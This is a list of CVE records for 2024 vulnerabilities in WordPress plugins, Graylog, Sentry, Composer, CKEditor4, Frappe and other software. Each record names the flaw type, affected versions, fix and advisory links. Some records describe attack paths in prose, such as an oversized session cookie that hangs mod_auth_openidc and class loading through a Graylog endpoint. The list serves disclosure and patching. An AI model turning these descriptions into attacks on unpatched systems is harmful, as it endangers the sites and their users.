CVE 2024 24847 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jgadbois CalculatorPro Calculators allows Reflected XSS.This issue affects CalculatorPro Calculators: from n/a through 1.1.7. MISC:https://patchstack.com/database/vulnerability/calculatorpro-calculators/wordpress-calculatorpro-calculators-plugin-1-1-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/calculatorpro-calculators/wordpress-calculatorpro-calculators-plugin-1-1-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24846 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MightyThemes Mighty Addons for Elementor allows Reflected XSS.This issue affects Mighty Addons for Elementor: from n/a through 1.9.3. MISC:https://patchstack.com/database/vulnerability/mighty-addons/wordpress-mighty-addons-for-elementor-plugin-1-9-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/mighty-addons/wordpress-mighty-addons-for-elementor-plugin-1-9-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24845 Candidate Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Sewpafly Post Thumbnail Editor.This issue affects Post Thumbnail Editor: from n/a through 2.4.8. MISC:https://patchstack.com/database/vulnerability/post-thumbnail-editor/wordpress-post-thumbnail-editor-plugin-2-4-8-unauthenticated-sensitive-data-exposure-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/post-thumbnail-editor/wordpress-post-thumbnail-editor-plugin-2-4-8-unauthenticated-sensitive-data-exposure-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24843 Candidate Cross-Site Request Forgery (CSRF) vulnerability in PowerPack Addons for Elementor PowerPack Pro for Elementor.This issue affects PowerPack Pro for Elementor: from n/a before 2.10.8. MISC:https://patchstack.com/database/vulnerability/powerpack-elements/wordpress-powerpack-pro-for-elementor-plugin-2-10-8-csrf-leading-to-plugin-settings-change-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/powerpack-elements/wordpress-powerpack-pro-for-elementor-plugin-2-10-8-csrf-leading-to-plugin-settings-change-xss-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24841 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dan's Art Add Customer for WooCommerce allows Stored XSS.This issue affects Add Customer for WooCommerce: from n/a through 1.7. MISC:https://patchstack.com/database/vulnerability/add-customer-for-woocommerce/wordpress-add-customer-for-woocommerce-plugin-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/add-customer-for-woocommerce/wordpress-add-customer-for-woocommerce-plugin-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24840 Candidate Missing Authorization vulnerability in BdThemes Element Pack Elementor Addons.This issue affects Element Pack Elementor Addons: from n/a through 5.4.11. MISC:https://patchstack.com/database/vulnerability/bdthemes-element-pack-lite/wordpress-element-pack-elementor-addons-plugin-5-4-11-broken-access-control-on-duplicate-post-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/bdthemes-element-pack-lite/wordpress-element-pack-elementor-addons-plugin-5-4-11-broken-access-control-on-duplicate-post-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24839 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gordon Böhme, Antonio Leutsch Structured Content (JSON-LD) #wpsc allows Stored XSS.This issue affects Structured Content (JSON-LD) #wpsc: from n/a through 1.6.1. MISC:https://patchstack.com/database/vulnerability/structured-content/wordpress-structured-content-json-ld-plugin-1-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/structured-content/wordpress-structured-content-json-ld-plugin-1-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24838 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Five Star Plugins Five Star Restaurant Reviews allows Stored XSS.This issue affects Five Star Restaurant Reviews: from n/a through 2.3.5. MISC:https://patchstack.com/database/vulnerability/good-reviews-wp/wordpress-five-star-restaurant-reviews-plugin-2-3-5-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/good-reviews-wp/wordpress-five-star-restaurant-reviews-plugin-2-3-5-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24837 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Frédéric GILLES FG PrestaShop to WooCommerce, Frédéric GILLES FG Drupal to WordPress, Frédéric GILLES FG Joomla to WordPress.This issue affects FG PrestaShop to WooCommerce: from n/a through 4.44.3; FG Drupal to WordPress: from n/a through 3.67.0; FG Joomla to WordPress: from n/a through 4.15.0. MISC:https://patchstack.com/database/vulnerability/fg-drupal-to-wp/wordpress-fg-drupal-to-wordpress-plugin-3-67-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/fg-drupal-to-wp/wordpress-fg-drupal-to-wordpress-plugin-3-67-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | MISC:https://patchstack.com/database/vulnerability/fg-joomla-to-wordpress/wordpress-fg-joomla-to-wordpress-plugin-4-15-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/fg-joomla-to-wordpress/wordpress-fg-joomla-to-wordpress-plugin-4-15-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | MISC:https://patchstack.com/database/vulnerability/fg-prestashop-to-woocommerce/wordpress-fg-prestashop-to-woocommerce-plugin-4-44-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/fg-prestashop-to-woocommerce/wordpress-fg-prestashop-to-woocommerce-plugin-4-44-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24836 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Audrasjb GDPR Data Request Form allows Stored XSS.This issue affects GDPR Data Request Form: from n/a through 1.6. MISC:https://patchstack.com/database/vulnerability/gdpr-data-request-form/wordpress-gdpr-data-request-form-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/gdpr-data-request-form/wordpress-gdpr-data-request-form-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24835 Candidate Missing Authorization vulnerability in realmag777 BEAR.This issue affects BEAR: from n/a through 1.1.4. MISC:https://patchstack.com/database/vulnerability/woo-bulk-editor/wordpress-bear-plugin-1-1-4-broken-access-control-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/woo-bulk-editor/wordpress-bear-plugin-1-1-4-broken-access-control-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24834 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in realmag777 BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net allows Stored XSS.This issue affects BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net: from n/a through 1.1.4. MISC:https://patchstack.com/database/vulnerability/woo-bulk-editor/wordpress-bear-plugin-1-1-4-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/woo-bulk-editor/wordpress-bear-plugin-1-1-4-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24832 Candidate Missing Authorization vulnerability in Metagauss EventPrime.This issue affects EventPrime: from n/a through 3.3.9. MISC:https://patchstack.com/database/vulnerability/eventprime-event-calendar-management/wordpress-eventprime-plugin-3-3-9-broken-access-control-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/eventprime-event-calendar-management/wordpress-eventprime-plugin-3-3-9-broken-access-control-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24830 Candidate OpenObserve is a observability platform built specifically for logs, metrics, traces, analytics, designed to work at petabyte scale. A vulnerability has been identified in the "/api/{org_id}/users" endpoint. This vulnerability allows any authenticated regular user ('member') to add new users with elevated privileges, including the 'root' role, to an organization. This issue circumvents the intended security controls for role assignments. The vulnerability resides in the user creation process, where the payload does not validate the user roles. A regular user can manipulate the payload to assign root-level privileges. This vulnerability leads to Unauthorized Privilege Escalation and significantly compromises the application's role-based access control system. It allows unauthorized control over application resources and poses a risk to data security. All users, particularly those in administrative roles, are impacted. This issue has been addressed in release version 0.8.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/openobserve/openobserve/security/advisories/GHSA-hfxx-g56f-8h5v | URL:https://github.com/openobserve/openobserve/security/advisories/GHSA-hfxx-g56f-8h5v Assigned (20240131)
CVE 2024 2483 Candidate A vulnerability, which was classified as problematic, has been found in Surya2Developer Hostel Management Service 1.0. This issue affects some unknown processing of the file /change-password.php of the component Password Change Handler. The manipulation of the argument oldpassword leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256889 was assigned to this vulnerability. MISC:VDB-256889 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.256889 | MISC:VDB-256889 | Surya2Developer Hostel Management Service Password Change change-password.php cross-site request forgery | URL:https://vuldb.com/?id.256889 | MISC:https://github.com/blackslim3/cve_sidequest/blob/main/poc/CSRF%20on%20Hostel%20Management%20System%20using%20PHP%20and%20MySQL%201.0.md | URL:https://github.com/blackslim3/cve_sidequest/blob/main/poc/CSRF%20on%20Hostel%20Management%20System%20using%20PHP%20and%20MySQL%201.0.md Assigned (20240315)
CVE 2024 24829 Candidate Sentry is an error tracking and performance monitoring platform. Sentry’s integration platform provides a way for external services to interact with Sentry. One of such integrations, the Phabricator integration (maintained by Sentry) with version <=24.1.1 contains a constrained SSRF vulnerability. An attacker could make Sentry send POST HTTP requests to arbitrary URLs (including internal IP addresses) by providing an unsanitized input to the Phabricator integration. However, the body payload is constrained to a specific format. If an attacker has access to a Sentry instance, this allows them to: 1. interact with internal network; 2. scan local/remote ports. This issue has been fixed in Sentry self-hosted release 24.1.2, and has already been mitigated on sentry.io on February 8. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/getsentry/self-hosted/releases/tag/24.1.2 | URL:https://github.com/getsentry/self-hosted/releases/tag/24.1.2 | MISC:https://github.com/getsentry/sentry/pull/64882 | URL:https://github.com/getsentry/sentry/pull/64882 | MISC:https://github.com/getsentry/sentry/security/advisories/GHSA-rqxh-fp9p-p98r | URL:https://github.com/getsentry/sentry/security/advisories/GHSA-rqxh-fp9p-p98r Assigned (20240131)
CVE 2024 24828 Candidate pkg is tool design to bundle Node.js projects into an executables. Any native code packages built by `pkg` are written to a hardcoded directory. On unix systems, this is `/tmp/pkg/*` which is a shared directory for all users on the same local system. There is no uniqueness to the package names within this directory, they are predictable. An attacker who has access to the same local system has the ability to replace the genuine executables in the shared directory with malicious executables of the same name. A user may then run the malicious executable without realising it has been modified. This package is deprecated. Therefore, there will not be a patch provided for this vulnerability. To check if your executable build by pkg depends on native code and is vulnerable, run the executable and check if `/tmp/pkg/` was created. Users should transition to actively maintained alternatives. We would recommend investigating Node.js 21’s support for single executable applications. Given the decision to deprecate the pkg package, there are no official workarounds or remediations provided by our team. Users should prioritize migrating to other packages that offer similar functionality with enhanced security. MISC:https://github.com/vercel/pkg/security/advisories/GHSA-22r3-9w55-cj54 | URL:https://github.com/vercel/pkg/security/advisories/GHSA-22r3-9w55-cj54 | MISC:https://nodejs.org/api/single-executable-applications.html | URL:https://nodejs.org/api/single-executable-applications.html Assigned (20240131)
CVE 2024 24827 Candidate Discourse is an open source platform for community discussion. Without a rate limit on the POST /uploads endpoint, it makes it easier for an attacker to carry out a DoS attack on the server since creating an upload can be a resource intensive process. Do note that the impact varies from site to site as various site settings like `max_image_size_kb`, `max_attachment_size_kb` and `max_image_megapixels` will determine the amount of resources used when creating an upload. The issue is patched in the latest stable, beta and tests-passed version of Discourse. Users are advised to upgrade. Users unable to upgrade should reduce `max_image_size_kb`, `max_attachment_size_kb` and `max_image_megapixels` as smaller uploads require less resources to process. Alternatively, `client_max_body_size` can be reduced in Nginx to prevent large uploads from reaching the server. MISC:https://github.com/discourse/discourse/commit/003b80e62f97cd8c0114d6b9d3f93c10443e6fae | URL:https://github.com/discourse/discourse/commit/003b80e62f97cd8c0114d6b9d3f93c10443e6fae | MISC:https://github.com/discourse/discourse/security/advisories/GHSA-58vw-246g-fjj4 | URL:https://github.com/discourse/discourse/security/advisories/GHSA-58vw-246g-fjj4 Assigned (20240131)
CVE 2024 24826 Candidate Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. An out-of-bounds read was found in Exiv2 version v0.28.1. The vulnerable function, `QuickTimeVideo::NikonTagsDecoder`, was new in v0.28.0, so Exiv2 versions before v0.28 are _not_ affected. The out-of-bounds read is triggered when Exiv2 is used to read the metadata of a crafted video file. In most cases this out of bounds read will result in a crash. This bug is fixed in version v0.28.2. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/Exiv2/exiv2/pull/2337 | URL:https://github.com/Exiv2/exiv2/pull/2337 | MISC:https://github.com/Exiv2/exiv2/security/advisories/GHSA-g9xm-7538-mq8w | URL:https://github.com/Exiv2/exiv2/security/advisories/GHSA-g9xm-7538-mq8w Assigned (20240131)
CVE 2024 24825 Candidate DIRAC is a distributed resource framework. In affected versions any user could get a token that has been requested by another user/agent. This may expose resources to unintended parties. This issue has been addressed in release version 8.0.37. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/DIRACGrid/DIRAC/commit/f9ddab755b9a69acb85e14d2db851d8ac0c9648c | URL:https://github.com/DIRACGrid/DIRAC/commit/f9ddab755b9a69acb85e14d2db851d8ac0c9648c | MISC:https://github.com/DIRACGrid/DIRAC/security/advisories/GHSA-59qj-jcjv-662j | URL:https://github.com/DIRACGrid/DIRAC/security/advisories/GHSA-59qj-jcjv-662j Assigned (20240131)
CVE 2024 24824 Candidate Graylog is a free and open log management platform. Starting in version 2.0.0 and prior to versions 5.1.11 and 5.2.4, arbitrary classes can be loaded and instantiated using a HTTP PUT request to the `/api/system/cluster_config/` endpoint. Graylog's cluster config system uses fully qualified class names as config keys. To validate the existence of the requested class before using them, Graylog loads the class using the class loader. If a user with the appropriate permissions performs the request, arbitrary classes with 1-arg String constructors can be instantiated. This will execute arbitrary code that is run during class instantiation. In the specific use case of `java.io.File`, the behavior of the internal web-server stack will lead to information exposure by including the entire file content in the response to the REST request. Versions 5.1.11 and 5.2.4 contain a fix for this issue. MISC:https://github.com/Graylog2/graylog2-server/blob/e458db8bf4f789d4d19f1b37f0263f910c8d036c/graylog2-server/src/main/java/org/graylog2/rest/resources/system/ClusterConfigResource.java#L208-L214 | URL:https://github.com/Graylog2/graylog2-server/blob/e458db8bf4f789d4d19f1b37f0263f910c8d036c/graylog2-server/src/main/java/org/graylog2/rest/resources/system/ClusterConfigResource.java#L208-L214 | MISC:https://github.com/Graylog2/graylog2-server/commit/75ef2b8d60e7d67f859b79fe712c8ae7b2e861d8 | URL:https://github.com/Graylog2/graylog2-server/commit/75ef2b8d60e7d67f859b79fe712c8ae7b2e861d8 | MISC:https://github.com/Graylog2/graylog2-server/commit/7f8ef7fa8edf493106d5ef6f777d4da02c5194d9 | URL:https://github.com/Graylog2/graylog2-server/commit/7f8ef7fa8edf493106d5ef6f777d4da02c5194d9 | MISC:https://github.com/Graylog2/graylog2-server/security/advisories/GHSA-p6gg-5hf4-4rgj | URL:https://github.com/Graylog2/graylog2-server/security/advisories/GHSA-p6gg-5hf4-4rgj Assigned (20240131)
CVE 2024 24823 Candidate Graylog is a free and open log management platform. Starting in version 4.3.0 and prior to versions 5.1.11 and 5.2.4, reauthenticating with an existing session cookie would re-use that session id, even if for different user credentials. In this case, the pre-existing session could be used to gain elevated access to an existing Graylog login session, provided the malicious user could successfully inject their session cookie into someone else's browser. The complexity of such an attack is high, because it requires presenting a spoofed login screen and injection of a session cookie into an existing browser, potentially through a cross-site scripting attack. No such attack has been discovered. Graylog 5.1.11 and 5.2.4, and any versions of the 6.0 development branch, contain patches to not re-use sessions under any circumstances. Some workarounds are available. Using short session expiration and explicit log outs of unused sessions can help limiting the attack vector. Unpatched this vulnerability exists, but is relatively hard to exploit. A proxy could be leveraged to clear the `authentication` cookie for the Graylog server URL for the `/api/system/sessions` endpoint, as that is the only one vulnerable. MISC:https://github.com/Graylog2/graylog2-server/commit/1596b749db86368ba476662f23a0f0c5ec2b5097 | URL:https://github.com/Graylog2/graylog2-server/commit/1596b749db86368ba476662f23a0f0c5ec2b5097 | MISC:https://github.com/Graylog2/graylog2-server/commit/b93a66353f35a94a4e8f3f75ac4f5cdc5a2d4a6a | URL:https://github.com/Graylog2/graylog2-server/commit/b93a66353f35a94a4e8f3f75ac4f5cdc5a2d4a6a | MISC:https://github.com/Graylog2/graylog2-server/security/advisories/GHSA-3xf8-g8gr-g7rh | URL:https://github.com/Graylog2/graylog2-server/security/advisories/GHSA-3xf8-g8gr-g7rh Assigned (20240131)
CVE 2024 24822 Candidate Pimcore's Admin Classic Bundle provides a backend user interface for Pimcore. Prior to version 1.3.3, an attacker can create, delete etc. tags without having the permission to do so. A fix is available in version 1.3.3. As a workaround, one may apply the patch manually. MISC:https://github.com/pimcore/admin-ui-classic-bundle/commit/24660b6d5ad9cbcb037a48d4309a6024e9adf251 | URL:https://github.com/pimcore/admin-ui-classic-bundle/commit/24660b6d5ad9cbcb037a48d4309a6024e9adf251 | MISC:https://github.com/pimcore/admin-ui-classic-bundle/pull/412 | URL:https://github.com/pimcore/admin-ui-classic-bundle/pull/412 | MISC:https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-3rfr-mpfj-2jwq | URL:https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-3rfr-mpfj-2jwq Assigned (20240131)
CVE 2024 24821 Candidate Composer is a dependency Manager for the PHP language. In affected versions several files within the local working directory are included during the invocation of Composer and in the context of the executing user. As such, under certain conditions arbitrary code execution may lead to local privilege escalation, provide lateral user movement or malicious code execution when Composer is invoked within a directory with tampered files. All Composer CLI commands are affected, including composer.phar's self-update. The following scenarios are of high risk: Composer being run with sudo, Pipelines which may execute Composer on untrusted projects, Shared environments with developers who run Composer individually on the same project. This vulnerability has been addressed in versions 2.7.0 and 2.2.23. It is advised that the patched versions are applied at the earliest convenience. Where not possible, the following should be addressed: Remove all sudo composer privileges for all users to mitigate root privilege escalation, and avoid running Composer within an untrusted directory, or if needed, verify that the contents of `vendor/composer/InstalledVersions.php` and `vendor/composer/installed.php` do not include untrusted code. A reset can also be done on these files by the following:```sh rm vendor/composer/installed.php vendor/composer/InstalledVersions.php composer install --no-scripts --no-plugins ``` MISC:https://github.com/composer/composer/commit/64e4eb356b159a30c766cd1ea83450a38dc23bf5 | URL:https://github.com/composer/composer/commit/64e4eb356b159a30c766cd1ea83450a38dc23bf5 | MISC:https://github.com/composer/composer/security/advisories/GHSA-7c6p-848j-wh5h | URL:https://github.com/composer/composer/security/advisories/GHSA-7c6p-848j-wh5h Assigned (20240131)
CVE 2024 24820 Candidate Icinga Director is a tool designed to make Icinga 2 configuration handling easy. Not any of Icinga Director's configuration forms used to manipulate the monitoring environment are protected against cross site request forgery (CSRF). It enables attackers to perform changes in the monitoring environment managed by Icinga Director without the awareness of the victim. Users of the map module in version 1.x, should immediately upgrade to v2.0. The mentioned XSS vulnerabilities in Icinga Web are already fixed as well and upgrades to the most recent release of the 2.9, 2.10 or 2.11 branch must be performed if not done yet. Any later major release is also suitable. Icinga Director will receive minor updates to the 1.8, 1.9, 1.10 and 1.11 branches to remedy this issue. Upgrade immediately to a patched release. If that is not feasible, disable the director module for the time being. MISC:https://blog.mozilla.org/en/mozilla/firefox-rolls-out-total-cookie-protection-by-default-to-all-users-worldwide/ | URL:https://blog.mozilla.org/en/mozilla/firefox-rolls-out-total-cookie-protection-by-default-to-all-users-worldwide/ | MISC:https://github.com/Icinga/icingaweb2-module-director/security/advisories/GHSA-3mwp-5p5v-j6q3 | URL:https://github.com/Icinga/icingaweb2-module-director/security/advisories/GHSA-3mwp-5p5v-j6q3 | MISC:https://github.com/Icinga/icingaweb2/issues?q=is%3Aissue++is%3Aclosed+4979+4960+4947 | URL:https://github.com/Icinga/icingaweb2/issues?q=is%3Aissue++is%3Aclosed+4979+4960+4947 | MISC:https://github.com/nbuchwitz/icingaweb2-module-map/pull/86 | URL:https://github.com/nbuchwitz/icingaweb2-module-map/pull/86 | MISC:https://support.apple.com/en-is/guide/safari/sfri11471/16.0 | URL:https://support.apple.com/en-is/guide/safari/sfri11471/16.0 | MISC:https://www.chromium.org/updates/same-site/ | URL:https://www.chromium.org/updates/same-site/ Assigned (20240131)
CVE 2024 2482 Candidate A vulnerability has been found in Surya2Developer Hostel Management Service 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /check_availability.php of the component HTTP POST Request Handler. The manipulation of the argument oldpassword leads to observable response discrepancy. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256891. MISC:VDB-256891 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256891 | MISC:VDB-256891 | Surya2Developer Hostel Management Service HTTP POST Request check_availability.php observable response discrepancy | URL:https://vuldb.com/?id.256891 | MISC:https://github.com/blackslim3/cve_sidequest/blob/main/poc/Username_and_Password_Enumeration%20on%20Hostel%20Management%20System%20using%20PHP%20and%20MySQL%201.0.md | URL:https://github.com/blackslim3/cve_sidequest/blob/main/poc/Username_and_Password_Enumeration%20on%20Hostel%20Management%20System%20using%20PHP%20and%20MySQL%201.0.md Assigned (20240315)
CVE 2024 24819 Candidate icingaweb2-module-incubator is a working project of bleeding edge Icinga Web 2 libraries. In affected versions the class `gipfl\Web\Form` is the base for various concrete form implementations [1] and provides protection against cross site request forgery (CSRF) by default. This is done by automatically adding an element with a CSRF token to any form, unless explicitly disabled, but even if enabled, the CSRF token (sent during a client's submission of a form relying on it) is not validated. This enables attackers to perform changes on behalf of a user which, unknowingly, interacts with a prepared link or website. The version 0.22.0 is available to remedy this issue. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/Icinga/icingaweb2-module-incubator/commit/db7dc49585fee0b4e96be666d7f6009a74a1ccb5 | URL:https://github.com/Icinga/icingaweb2-module-incubator/commit/db7dc49585fee0b4e96be666d7f6009a74a1ccb5 | MISC:https://github.com/Icinga/icingaweb2-module-incubator/security/advisories/GHSA-p8vv-9pqq-rm8p | URL:https://github.com/Icinga/icingaweb2-module-incubator/security/advisories/GHSA-p8vv-9pqq-rm8p | MISC:https://github.com/search?q=gipfl%5CWeb%5CForm%3B&type=code | URL:https://github.com/search?q=gipfl%5CWeb%5CForm%3B&type=code Assigned (20240131)
CVE 2024 24818 Candidate EspoCRM is an Open Source Customer Relationship Management software. An attacker can inject arbitrary IP or domain in "Password Change" page and redirect victim to malicious page that could lead to credential stealing or another attack. This vulnerability is fixed in 8.1.2. MISC:https://github.com/espocrm/espocrm/commit/3babdfa3399e328fb1bd83a1b4ed03d509f4c8e7 | URL:https://github.com/espocrm/espocrm/commit/3babdfa3399e328fb1bd83a1b4ed03d509f4c8e7 | MISC:https://github.com/espocrm/espocrm/security/advisories/GHSA-8gv6-8r33-fm7j | URL:https://github.com/espocrm/espocrm/security/advisories/GHSA-8gv6-8r33-fm7j Assigned (20240131)
CVE 2024 24817 Candidate Discourse Calendar adds the ability to create a dynamic calendar in the first post of a topic on the open-source discussion platform Discourse. Prior to version 0.4, event invitees created in topics in private categories or PMs (private messages) can be retrieved by anyone, even if they're not logged in. This problem is resolved in version 0.4 of the discourse-calendar plugin. While no known workaround is available, putting the site behind `login_required` will disallow this endpoint to be used by anonymous users, but logged in users can still get the list of invitees in the private topics. MISC:https://github.com/discourse/discourse-calendar/commit/84ef46a38cf02748ecacad16c5d9c6fec12dc8da | URL:https://github.com/discourse/discourse-calendar/commit/84ef46a38cf02748ecacad16c5d9c6fec12dc8da | MISC:https://github.com/discourse/discourse-calendar/security/advisories/GHSA-wwq5-g5cp-c69f | URL:https://github.com/discourse/discourse-calendar/security/advisories/GHSA-wwq5-g5cp-c69f Assigned (20240131)
CVE 2024 24816 Candidate CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A cross-site scripting vulnerability vulnerability has been discovered in versions prior to 4.24.0-lts in samples that use the `preview` feature. All integrators that use these samples in the production code can be affected. The vulnerability allows an attacker to execute JavaScript code by abusing the misconfigured preview feature. It affects all users using the CKEditor 4 at version < 4.24.0-lts with affected samples used in a production environment. A fix is available in version 4.24.0-lts. MISC:https://ckeditor.com/cke4/addon/preview | URL:https://ckeditor.com/cke4/addon/preview | MISC:https://github.com/ckeditor/ckeditor4/commit/8ed1a3c93d0ae5f49f4ecff5738ab8a2972194cb | URL:https://github.com/ckeditor/ckeditor4/commit/8ed1a3c93d0ae5f49f4ecff5738ab8a2972194cb | MISC:https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-mw2c-vx6j-mg76 | URL:https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-mw2c-vx6j-mg76 Assigned (20240131)
CVE 2024 24815 Candidate CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A cross-site scripting vulnerability has been discovered in the core HTML parsing module in versions of CKEditor4 prior to 4.24.0-lts. It may affect all editor instances that enabled full-page editing mode or enabled CDATA elements in Advanced Content Filtering configuration (defaults to `script` and `style` elements). The vulnerability allows attackers to inject malformed HTML content bypassing Advanced Content Filtering mechanism, which could result in executing JavaScript code. An attacker could abuse faulty CDATA content detection and use it to prepare an intentional attack on the editor. A fix is available in version 4.24.0-lts. MISC:https://www.drupal.org/sa-contrib-2024-009 | MISC:https://ckeditor.com/docs/ckeditor4/latest/api/CKEDITOR_dtd.html#property-S-cdata | URL:https://ckeditor.com/docs/ckeditor4/latest/api/CKEDITOR_dtd.html#property-S-cdata | MISC:https://ckeditor.com/docs/ckeditor4/latest/features/fullpage.html | URL:https://ckeditor.com/docs/ckeditor4/latest/features/fullpage.html | MISC:https://ckeditor.com/docs/ckeditor4/latest/guide/dev_advanced_content_filter.html | URL:https://ckeditor.com/docs/ckeditor4/latest/guide/dev_advanced_content_filter.html | MISC:https://github.com/ckeditor/ckeditor4/commit/8ed1a3c93d0ae5f49f4ecff5738ab8a2972194cb | URL:https://github.com/ckeditor/ckeditor4/commit/8ed1a3c93d0ae5f49f4ecff5738ab8a2972194cb | MISC:https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-fq6h-4g8v-qqvm | URL:https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-fq6h-4g8v-qqvm Assigned (20240131)
CVE 2024 24814 Candidate mod_auth_openidc is an OpenID Certified™ authentication and authorization module for the Apache 2.x HTTP server that implements the OpenID Connect Relying Party functionality. In affected versions missing input validation on mod_auth_openidc_session_chunks cookie value makes the server vulnerable to a denial of service (DoS) attack. An internal security audit has been conducted and the reviewers found that if they manipulated the value of the mod_auth_openidc_session_chunks cookie to a very large integer, like 99999999, the server struggles with the request for a long time and finally gets back with a 500 error. Making a few requests of this kind caused our server to become unresponsive. Attackers can craft requests that would make the server work very hard (and possibly become unresponsive) and/or crash with minimal effort. This issue has been addressed in version 2.4.15.2. Users are advised to upgrade. There are no known workarounds for this vulnerability. FEDORA:FEDORA-2024-3c0f2a2771 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T7DKVEVREYAI4F46CQAVOTPL75WLOZOE/ | MISC:https://github.com/OpenIDC/mod_auth_openidc/commit/4022c12f314bd89d127d1be008b1a80a08e1203d | URL:https://github.com/OpenIDC/mod_auth_openidc/commit/4022c12f314bd89d127d1be008b1a80a08e1203d | MISC:https://github.com/OpenIDC/mod_auth_openidc/security/advisories/GHSA-hxr6-w4gc-7vvv | URL:https://github.com/OpenIDC/mod_auth_openidc/security/advisories/GHSA-hxr6-w4gc-7vvv | MLIST:[debian-lts-announce] 20240305 [SECURITY] [DLA 3751-1] libapache2-mod-auth-openidc security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00004.html Assigned (20240131)
CVE 2024 24813 Candidate Frappe is a full-stack web application framework. Prior to versions 14.64.0 and 15.0.0, SQL injection from a particular whitelisted method can result in access to data which the user doesn't have permission to access. Versions 14.64.0 and 15.0.0 contain a patch for this issue. No known workarounds are available. MISC:https://github.com/frappe/frappe/security/advisories/GHSA-fxfv-7gwx-54jh | URL:https://github.com/frappe/frappe/security/advisories/GHSA-fxfv-7gwx-54jh Assigned (20240131)
CVE 2024 24812 Candidate Frappe is a full-stack web application framework that uses Python and MariaDB on the server side and a tightly integrated client side library. Prior to versions 14.59.0 and 15.5.0, portal pages are susceptible to Cross-Site Scripting (XSS) which can be used to inject malicious JS code if user clicks on a malicious link. This vulnerability has been patched in versions 14.59.0 and 15.5.0. No known workarounds are available. MISC:https://github.com/frappe/frappe/releases/tag/v14.59.0 | URL:https://github.com/frappe/frappe/releases/tag/v14.59.0 | MISC:https://github.com/frappe/frappe/releases/tag/v15.5.0 | URL:https://github.com/frappe/frappe/releases/tag/v15.5.0 | MISC:https://github.com/frappe/frappe/security/advisories/GHSA-7p3m-h76m-hg9v | URL:https://github.com/frappe/frappe/security/advisories/GHSA-7p3m-h76m-hg9v Assigned (20240131)
